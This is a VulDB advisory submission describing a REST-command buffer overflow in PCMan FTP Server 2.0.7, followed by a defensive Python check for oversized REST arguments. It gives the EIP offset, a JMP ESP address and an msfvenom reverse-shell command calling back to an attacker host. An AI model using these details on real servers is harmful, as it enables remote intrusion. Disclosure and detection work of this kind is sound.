Submission #575624: PCMan FTP Server 2.0.7 Buffer Overflow

Title: PCMan FTP Server 2.0.7 Buffer Overflow
Description: This exploitation technique was successfully validated against Windows XP Professional, Service Pack 2 and Service Pack 3, targeting the 32-bit build of PCMan FTP Server version 2.0.7.

The vulnerability assessment began with a series of fuzzing attempts in which large amounts of data were sent through various FTP commands. The REST command was identified as vulnerable to a buffer overflow when supplied with an excessively long argument: the application crashed, indicating that critical memory regions, including the Instruction Pointer (EIP), had been overwritten.

To determine the exact offset at which EIP was overwritten, the Metasploit Framework utilities msf-pattern_create -l 5000 and msf-pattern_offset -q <crashed_EIP> were employed. These tools generate a unique pattern and calculate the offset of a given value within it, respectively. In this specific case, EIP was found to be overwritten after 2006 bytes of input.

Once the offset was confirmed, the next phase involved redirecting the execution flow to a controlled memory region. Using Mona.py, a plugin for Immunity Debugger, the following command was executed to locate a reliable JMP ESP instruction within a non-ASLR, non-SafeSEH module:

!mona jmp -r esp -n

The address 0x74e32fd9 was selected because it met the necessary exploitability criteria (static address, executable memory, no bad characters). Before the shellcode, a NOP sled (\x90 * 20) was added to provide a safe landing zone. The shellcode itself was generated with the following msfvenom command:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform windows -f python

The bad characters \x00, \x0a and \x0d were explicitly excluded because of their disruptive effect in this context (null termination, newline, carriage return). A complete bytearray-based bad-character analysis was omitted, as the environment and server behavior were already well characterized through prior experimentation.

The final payload structure was as follows:

[prefix buffer (2006 bytes)] + [EIP overwrite] + [NOP sled (20 bytes)] + [reverse shell shellcode]

Upon successful transmission of the payload via the REST command, the application's execution flow was hijacked, leading to execution of the shellcode and establishment of a reverse TCP shell to the attacker's machine. This confirms the exploit's ability to achieve arbitrary code execution with remote access.
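From the defender's side, the description above gives the detection signal: a REST command whose argument is far longer than any legitimate restart marker, is not a decimal offset, or carries non-printable bytes. The following Python check is an added example written for this page; it is not code from the submission, the PoC repository or PCMan. The sample command lines are constructed, and the 512-byte threshold is an assumption chosen to sit well below the 2006-byte crash length the submission reports.

```python
import re

# Constructed sample of FTP control-channel command lines, as a server log
# or packet capture might record them. Not taken from the page or the PoC.
SAMPLE_COMMANDS = [
    "USER anonymous",
    "PASS guest@example.org",
    "REST 1024",                      # legitimate restart marker
    "REST " + "A" * 3000,             # fuzzing-style oversized argument
    "RETR report.pdf",
    "REST 12abc",                     # malformed marker
]

# RFC 959 defines REST's argument as a server marker; for PCMan and most
# FTP servers that marker is a decimal byte offset, so anything else is odd.
MARKER_RE = re.compile(r"^[0-9]{1,20}$")

# Assumed threshold (not from the page): generous for real markers, yet far
# below the 2006-byte overwrite length the submission describes.
MAX_ARG_LEN = 512


def classify_command(line: str, max_arg_len: int = MAX_ARG_LEN) -> dict:
    """Split one FTP command line and list why it looks anomalous, if at all."""
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    reasons = []
    if len(arg) > max_arg_len:
        reasons.append(f"argument length {len(arg)} exceeds {max_arg_len}")
    if not (arg.isascii() and arg.isprintable()):
        # Encoded shellcode almost always contains bytes outside printable ASCII.
        reasons.append("argument contains non-printable or non-ASCII bytes")
    if verb == "REST" and not MARKER_RE.match(arg):
        reasons.append("REST marker is not a plain decimal offset")
    return {"verb": verb, "arg_len": len(arg), "reasons": reasons}


def find_anomalies(lines) -> list:
    """Return the classification records for every line that raised a reason."""
    return [rec for rec in map(classify_command, lines) if rec["reasons"]]


if __name__ == "__main__":
    for rec in find_anomalies(SAMPLE_COMMANDS):
        print(f"{rec['verb']} (arg_len={rec['arg_len']}): {'; '.join(rec['reasons'])}")
```

Running the block over the constructed sample flags the 3000-byte REST line (length and marker-format reasons) and the "REST 12abc" line (marker-format reason) while leaving the ordinary commands untouched. The same function can be applied to other length-sensitive FTP verbs by dropping the verb-specific marker check, since the length and printability tests are verb-agnostic.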
Source: https://github.com/Blu3B3ard/PoC-Pacman-FTP-Server-2.0.7/blob/main/exploit.txt
User: Blu3B3ard (UID 85197)
Submitted: 12/05/2025 13:35 (11 months ago)
Moderated: 16/05/2025 21:29 (4 days later)
Status: Accepted
VulDB Entry: 309413 [PCMan FTP Server 2.0.7 REST Command buffer overflow]
Points: 20
